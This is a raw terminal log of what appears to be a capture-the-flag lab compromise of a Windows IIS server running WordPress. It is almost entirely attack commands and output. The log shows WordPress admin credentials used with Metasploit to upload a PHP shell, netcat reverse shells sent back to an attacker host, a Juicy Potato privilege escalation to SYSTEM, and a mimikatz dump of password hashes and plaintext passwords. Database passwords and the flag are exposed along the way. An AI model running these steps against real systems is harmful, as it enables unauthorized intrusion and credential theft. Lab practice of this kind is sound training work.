$ nmap -p- -T4 -A 10.10.10.29
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3306/tcp open mysql MySQL (unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
$ dirb http://10.10.10.29
---- Scanning URL: http://10.10.10.29/ ----
==> DIRECTORY: http://10.10.10.29/wordpress/
login http://http://10.10.10.29/wordpress/ with admin/P@s5w0rd!
$ wpscan --url http://10.10.10.29/wordpress/
The administrative access can be leveraged through the msfmodule exploit/unix/webapp/wp_admin_shell_upload , to get a meterpreter shell on the system.
$ msfconsole
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD P@s5w0rd!
PASSWORD => P@s5w0rd!
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOST 10.10.10.29
RHOST => 10.10.10.29
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 10.10.14.197
LHOST => 10.10.14.197
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 10.10.14.197:4444
[*] Authenticating with WordPress using admin:P@s5w0rd!...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wordpress/wp-content/plugins/fogcxdzKET/HECmDltuPy.php...
[*] Sending stage (39282 bytes) to 10.10.10.29
[+] Deleted HECmDltuPy.php
[+] Deleted fogcxdzKET.php
[*] Meterpreter session 1 opened (10.10.14.197:4444 -> 10.10.10.29:51938) at 2021-05-04 12:03:39 -0400
[!] This exploit may require manual cleanup of '../fogcxdzKET' on the target
meterpreter > ls
Listing: C:\inetpub\wwwroot\wordpress\wp-content\plugins\fogcxdzKET
===================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
HECmDltuPy.php
meterpreter > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
meterpreter > ls
Listing: C:\inetpub\wwwroot\wordpress\wp-content\uploads
========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 18093 fil 2020-02-10 06:07:10 -0500 black-shield-shape-drawing-illustration-png-clip-art-150x150.png
100666/rw-rw-rw- 20083 fil 2020-02-10 06:07:10 -0500 black-shield-shape-drawing-illustration-png-clip-art-273x300.png
100666/rw-rw-rw- 254028 fil 2020-02-10 06:07:10 -0500 black-shield-shape-drawing-illustration-png-clip-art-768x844.png
100666/rw-rw-rw- 11676 fil 2020-02-10 06:07:09 -0500 black-shield-shape-drawing-illustration-png-clip-art.png
100666/rw-rw-rw- 23065 fil 2020-02-10 06:07:21 -0500 cropped-black-shield-shape-drawing-illustration-png-clip-art-150x150.png
100666/rw-rw-rw- 36889 fil 2020-02-10 06:07:21 -0500 cropped-black-shield-shape-drawing-illustration-png-clip-art.png
meterpreter > upload nc.exe
[*] uploading : /home/kali/0.htb/Starting_Point/Shield29/nc.exe -> nc.exe
[*] Uploaded -1.00 B of 58.00 KiB (-0.0%): /home/kali/0.htb/Starting_Point/Shield29/nc.exe -> nc.exe
[*] uploaded : /home/kali/0.htb/Starting_Point/Shield29/nc.exe -> nc.exe
meterpreter > upload js.exe
[*] uploading : /home/kali/0.htb/Starting_Point/Shield29/js.exe -> js.exe
[*] Uploaded -1.00 B of 339.50 KiB (-0.0%): /home/kali/0.htb/Starting_Point/Shield29/js.exe -> js.exe
[*] uploaded : /home/kali/0.htb/Starting_Point/Shield29/js.exe -> js.exe
meterpreter > upload mimikatz.exe
[*] uploading : /home/kali/0.htb/Starting_Point/Shield29/mimikatz.exe -> mimikatz.exe
[*] Uploaded -1.00 B of 1.25 MiB (0.0%): /home/kali/0.htb/Starting_Point/Shield29/mimikatz.exe -> mimikatz.exe
[*] uploaded : /home/kali/0.htb/Starting_Point/Shield29/mimikatz.exe -> mimikatz.exe
meterpreter > ls
c:\inetpub\wwwroot\wordpress\wp-content\uploads>
05/04/2021 04:01 PM 347,648 js.exe <-juicypotato.exe
05/04/2021 04:01 PM 1,309,448 mimikatz.exe
05/04/2021 04:00 PM 59,392 nc.exe
kali@kali:~/0.htb/Starting_Point/Shield29$ nc -lvnp 1234
meterpreter > execute -f nc.exe -a "-e cmd.exe 10.10.14.197 1234"
Process 4216 created.
meterpreter >
kali@kali:~/0.htb/Starting_Point/Shield29$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.197] from (UNKNOWN) [10.10.10.29] 49978
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\inetpub\wwwroot\wordpress\wp-content\uploads>
c:\inetpub\temp\appPools>ver
Microsoft Windows [Version 10.0.14393]
c:\inetpub\wwwroot\wordpress>type wp-config.php
define('DB_NAME', 'wordpress124');
/** MySQL database username */
define('DB_USER', 'wordpressuser124');
/** MySQL database password */
define('DB_PASSWORD', 'P_-U9dA6q.B|');
/** MySQL hostname */
define('DB_HOST', 'localhost');
Juicy Potato https://github.com/ohpe/juicy-potato/releases
C:\inetpub\wwwroot\wordpress\wp-content\uploads>echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.197 1111 >shell.bat
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.197 1111 >shell.bat
kali@kali:~/0.htb/Starting_Point/Shield29$ nc -lvnp 1111
listening on [any] 1111 ...
C:\inetpub\wwwroot\wordpress\wp-content\uploads>js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
C:\inetpub\wwwroot\wordpress\wp-content\uploads>
kali@kali:~/0.htb/Starting_Point/Shield29$ nc -lvnp 1111
listening on [any] 1111 ...
connect to [10.10.14.197] from (UNKNOWN) [10.10.10.29] 51982
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> cd c:\users\administrator\desktop
cd c:\users\administrator\desktop
PS C:\users\administrator\desktop> dir
dir
Directory: C:\users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/25/2020 1:28 PM 32 root.txt
PS C:\users\administrator\desktop> type root.txt
type root.txt
6e9a9fdc6f64e410a68b847bb4b404fa
PS C:\users\administrator\desktop> copy c:\inetpub\wwwroot\wordpress\wp-content\uploads\mimikatz.exe .
copy c:\inetpub\wwwroot\wordpress\wp-content\uploads\mimikatz.exe .
PS C:\users\administrator\desktop> dir
dir
Directory: C:\users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/4/2021 4:01 PM 1309448 mimikatz.exe
-ar--- 2/25/2020 1:28 PM 32 root.txt
PS C:\users\administrator\desktop> ./mimikatz.exe sekurlsa::logonpasswords
./mimikatz.exe sekurlsa::logonpasswords
.#####. mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 1334026 (00000000:00145b0a)
Session : Service from 0
User Name : DefaultAppPool
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 5/4/2021 2:30:33 PM
SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
msv :
[00000003] Primary
* Username : SHIELD$
* Domain : MEGACORP
* NTLM : 9d4feee71a4f411bf92a86b523d64437
* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da
tspkg :
wdigest :
* Username : SHIELD$
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : SHIELD$
* Domain : MEGACORP.LOCAL
* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
ssp :
credman :
Authentication Id : 0 ; 65636 (00000000:00010064)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 5/4/2021 2:15:10 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : SHIELD$
* Domain : MEGACORP
* NTLM : 9d4feee71a4f411bf92a86b523d64437
* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da
tspkg :
wdigest :
* Username : SHIELD$
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : SHIELD$
* Domain : MEGACORP.LOCAL
* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : SHIELD$
Domain : MEGACORP
Logon Server : (null)
Logon Time : 5/4/2021 2:15:10 PM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : SHIELD$
* Domain : MEGACORP
* NTLM : 9d4feee71a4f411bf92a86b523d64437
* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da
tspkg :
wdigest :
* Username : SHIELD$
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : shield$
* Domain : MEGACORP.LOCAL
* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
ssp :
credman :
Authentication Id : 0 ; 297853 (00000000:00048b7d)
Session : Interactive from 1
User Name : sandra
Domain : MEGACORP
Logon Server : PATHFINDER
Logon Time : 5/4/2021 2:16:27 PM
SID : S-1-5-21-1035856440-4137329016-3276773158-1105
msv :
[00000003] Primary
* Username : sandra
* Domain : MEGACORP
* NTLM : 29ab86c5c4d2aab957763e5c1720486d
* SHA1 : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38
* DPAPI : f4c73b3f07c4f309ebf086644254bcbc
tspkg :
wdigest :
* Username : sandra
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : sandra
* Domain : MEGACORP.LOCAL
* Password : Password1234!
ssp :
credman :
Authentication Id : 0 ; 167921 (00000000:00028ff1)
Session : Service from 0
User Name : wordpress
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 5/4/2021 2:15:31 PM
SID : S-1-5-82-698136220-2753279940-1413493927-70316276-1736946139
msv :
[00000003] Primary
* Username : SHIELD$
* Domain : MEGACORP
* NTLM : 9d4feee71a4f411bf92a86b523d64437
* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da
tspkg :
wdigest :
* Username : SHIELD$
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : SHIELD$
* Domain : MEGACORP.LOCAL
* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
ssp :
credman :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 5/4/2021 2:15:13 PM
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 5/4/2021 2:15:10 PM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 65655 (00000000:00010077)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 5/4/2021 2:15:10 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : SHIELD$
* Domain : MEGACORP
* NTLM : 9d4feee71a4f411bf92a86b523d64437
* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da
tspkg :
wdigest :
* Username : SHIELD$
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : SHIELD$
* Domain : MEGACORP.LOCAL
* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
ssp :
credman :
Authentication Id : 0 ; 36398 (00000000:00008e2e)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 5/4/2021 2:15:09 PM
SID :
msv :
[00000003] Primary
* Username : SHIELD$
* Domain : MEGACORP
* NTLM : 9d4feee71a4f411bf92a86b523d64437
* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : SHIELD$
Domain : MEGACORP
Logon Server : (null)
Logon Time : 5/4/2021 2:15:09 PM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : SHIELD$
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : shield$
* Domain : MEGACORP.LOCAL
* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
ssp :
credman :
mimikatz # ls
ERROR mimikatz_doLocal ; "ls" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz # exit
Bye!